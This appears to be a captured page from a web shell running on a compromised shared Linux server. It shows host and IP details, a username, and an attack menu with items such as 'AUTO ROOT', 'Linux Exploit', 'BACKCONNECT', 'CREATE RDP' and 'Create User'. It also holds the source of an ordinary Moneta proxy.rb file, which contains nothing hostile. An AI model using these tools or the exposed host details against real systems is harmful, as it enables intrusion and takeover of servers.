Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.47
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
lib /
ruby /
vendor_ruby /
moneta /
[ HOME SHELL ]
Name
Size
Permission
Action
adapters
[ DIR ]
drwxr-xr-x
transformer
[ DIR ]
drwxr-xr-x
builder.rb
2.47
KB
-rw-r--r--
cache.rb
2.77
KB
-rw-r--r--
expires.rb
2.29
KB
-rw-r--r--
lock.rb
467
B
-rw-r--r--
logger.rb
1.83
KB
-rw-r--r--
mixins.rb
9.72
KB
-rw-r--r--
optionmerger.rb
1.3
KB
-rw-r--r--
pool.rb
1.36
KB
-rw-r--r--
proxy.rb
2.71
KB
-rw-r--r--
server.rb
3.3
KB
-rw-r--r--
shared.rb
1.64
KB
-rw-r--r--
stack.rb
2.36
KB
-rw-r--r--
synchronize.rb
3.07
KB
-rw-r--r--
transformer.rb
7.58
KB
-rw-r--r--
utils.rb
584
B
-rw-r--r--
version.rb
80
B
-rw-r--r--
weak.rb
949
B
-rw-r--r--
wrapper.rb
1.05
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : proxy.rb
module Moneta # Proxy base class # @api public class Proxy include Defaults attr_reader :adapter # @param [Moneta store] adapter underlying adapter # @param [Hash] options def initialize(adapter, options = {}) @adapter = adapter end # (see Defaults#key?) def key?(key, options = {}) adapter.key?(key, options) end # (see Defaults#increment) def increment(key, amount = 1, options = {}) adapter.increment(key, amount, options) end # (see Defaults#create) def create(key, value, options = {}) adapter.create(key, value, options) end # (see Defaults#close) def close adapter.close end # Fetch value with key. Return nil if the key doesn't exist # # @param [Object] key # @param [Hash] options # @option options [Integer] :expires Update expiration time (See {Expires}) # @option options [Boolean] :raw Raw access without value transformation (See {Transformer}) # @option options [String] :prefix Prefix key (See {Transformer}) # @option options [Boolean] :sync Synchronized load ({Cache} reloads from adapter, {Adapters::Daybreak} syncs with file) # @option options Other options as defined by the adapters or middleware # @return [Object] value # @api public def load(key, options = {}) adapter.load(key, options) end # Store value with key # # @param [Object] key # @param [Object] value # @param [Hash] options # @option options [Integer] :expires Set expiration time (See {Expires}) # @option options [Boolean] :raw Raw access without value transformation (See {Transformer}) # @option options [String] :prefix Prefix key (See {Transformer}) # @option options Other options as defined by the adapters or middleware # @return value # @api public def store(key, value, options = {}) adapter.store(key, value, options) end # Delete the key from the store and return the current value # # @param [Object] key # @return [Object] current value # @param [Hash] options # @option options [Boolean] :raw Raw access without value transformation (See {Transformer}) # @option options [String] :prefix Prefix key (See {Transformer}) # @option options Other options as defined by the adapters or middleware # @api public def delete(key, options = {}) adapter.delete(key, options) end # Clear all keys in this store # # @param [Hash] options # @return [void] # @api public def clear(options = {}) adapter.clear(options) self end # (see Default#features) def features @features ||= (self.class.features + adapter.features).uniq.freeze end end end
Close